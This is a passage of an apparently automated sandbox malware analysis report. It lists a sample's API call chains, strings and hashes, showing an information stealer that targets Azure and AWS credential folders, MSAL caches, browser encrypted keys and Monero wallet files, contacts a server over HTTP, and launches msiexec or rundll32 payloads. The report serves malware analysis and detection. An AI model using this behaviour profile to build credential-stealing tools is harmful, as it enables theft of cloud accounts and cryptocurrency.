                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: feb55c329ab4f66fc00da53934669984a81aa87dab57f6e297d7925cb4931911
                          • Instruction ID: 2c332d81e33348ccf4f4476b9629f8defb3a1413796990370aadc8ed095f42cb
                          • Opcode Fuzzy Hash: feb55c329ab4f66fc00da53934669984a81aa87dab57f6e297d7925cb4931911
                          • Instruction Fuzzy Hash: 3FE12271D00109ABDB14EBA0DCA9FEE7B78BF94301F50425AF50663191EF346A4ECB65
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0123C050,00000000,00020019,00000000,005605B6), ref: 005583A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                          • wsprintfA.USER32 ref: 00558459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                          • Instruction ID: 4db97ab99808f7c869fc04b5572e0e5550160f43435c2e3f83d23996b033f30c
                          • Opcode Fuzzy Hash: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                          • Instruction Fuzzy Hash: 65813E7191011CABEB24DB50CC95FEA7BB8FF48701F10869AE509A6180DF746B89CFA5
                          APIs
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00554DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00554DCD
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                            • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                          • lstrcat.KERNEL32(?,00000000), ref: 00554E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00554E59
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                            • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                            • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00554EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00554EE5
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
                            • Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,0123FC20), ref: 00554A4A
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
                            • Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
                            • Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: f383f44c4d87b0619e432911ee427827e499992bb4f4540c1ab9822d549c9f0e
                          • Instruction ID: eb01a3b3a21a54de70e464799a94e7f5993ca0f8ea92c638f201adb4bf2a2b56
                          • Opcode Fuzzy Hash: f383f44c4d87b0619e432911ee427827e499992bb4f4540c1ab9822d549c9f0e
                          • Instruction Fuzzy Hash: 7941A1BA94020867DB10F770EC5BFED3A38BB64705F404595B589660C2EEB457CC8BA2
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0055906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                          • Instruction ID: 93335c7fb11d32f14c70677f2e42e07288529cfa08e4425dbb2ee3daccdebc28
                          • Opcode Fuzzy Hash: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                          • Instruction Fuzzy Hash: C4712F71940209EBDB04DFE4DC99FEEBBB8BF88301F108509F515A7290DB38A945CB65
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 005531C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0055335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 005534EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                          • Instruction ID: a302a5010253c0b834bd29173f21d2f69d1744a6aa28ac238cf985029e935c15
                          • Opcode Fuzzy Hash: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                          • Instruction Fuzzy Hash: 661212718101199ADB05EBA0DCAAFEEBB78BF54301F50425AF90676191EF342B4ECF52
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                            • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546303
                            • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                            • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0123F440,00000000,00000000,00400100,00000000), ref: 00546385
                            • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                            • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                          • lstrlen.KERNEL32(00000000), ref: 0055532F
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                          • lstrlen.KERNEL32(00000000), ref: 00555383
                          • lstrlen.KERNEL32(00000000), ref: 005553AE
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 69309068ce080e016864761b81e2aafd688e95002bcdf1ea277f5eeaf27d9058
                          • Instruction ID: 76a70922e8b198612253767087d71a19f8e6301268de5a91cbe0d1e8c14cbf42
                          • Opcode Fuzzy Hash: 69309068ce080e016864761b81e2aafd688e95002bcdf1ea277f5eeaf27d9058
                          • Instruction Fuzzy Hash: D2510C3091014AABDB14EF60C9AAAED7F79BF90302F504119FC065A592EF346B49CB66
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 164e70e7529968c60031cd04515c48adf3d70d4cf64135c5535d65596e100a98
                          • Instruction ID: 96d7e9f77bb8ac1c35246eed8e81c9395d597179039a7a7c1e1291008d59d47e
                          • Opcode Fuzzy Hash: 164e70e7529968c60031cd04515c48adf3d70d4cf64135c5535d65596e100a98
                          • Instruction Fuzzy Hash: 42C1E8B590010DABCB14EF60DC9DFEA7B78BF94301F10459AF90A67141EB74AA89CF91
                          APIs
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 005542EC
                          • lstrcat.KERNEL32(?,0123F548), ref: 0055430B
                          • lstrcat.KERNEL32(?,?), ref: 0055431F
                          • lstrcat.KERNEL32(?,0123DA18), ref: 00554333
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                            • Part of subcall function 00549CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 005593C0: GlobalAlloc.KERNEL32(00000000,005543DD,005543DD), ref: 005593D3
                          • StrStrA.SHLWAPI(?,0123F4D0), ref: 005543F3
                          • GlobalFree.KERNEL32(?), ref: 00554512
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                            • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                            • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 005544A3
                          • StrCmpCA.SHLWAPI(?,005608D1), ref: 005544C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005544D2
                          • lstrcat.KERNEL32(00000000,?), ref: 005544E5
                          • lstrcat.KERNEL32(00000000,00560FB8), ref: 005544F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 9969f51f7dd3e69d981508520a37a2e7b3098bc2cba8ecd400570ae7dfc5432d
                          • Instruction ID: 0990c37587f8534da9e214494aab66485a8eee2ff12162991886b9a421ee8f96
                          • Opcode Fuzzy Hash: 9969f51f7dd3e69d981508520a37a2e7b3098bc2cba8ecd400570ae7dfc5432d
                          • Instruction Fuzzy Hash: 3B717A76900209B7DB14EBB0DC99FEE7778BB88305F008599F60597181EA34DB49CFA1
                          APIs
                            • Part of subcall function 005412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                            • Part of subcall function 005412A0: RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                            • Part of subcall function 005412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                            • Part of subcall function 005412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                            • Part of subcall function 005412A0: RegCloseKey.ADVAPI32(?), ref: 005412FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0054134F
                          • lstrlen.KERNEL32(?), ref: 0054135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00541377
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00541465
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 005414EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                          • Instruction ID: 8bd5bca6df3892e5a226774a2ee33e6d60d2f5b283a2db29aa0b74d1655ca757
                          • Opcode Fuzzy Hash: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                          • Instruction Fuzzy Hash: 595145B1D5011A57CB15FB60DDA6FED773CBF94301F404299B60A62081EE346B89CFA6
                          APIs
                            • Part of subcall function 005472D0: memset.MSVCRT ref: 00547314
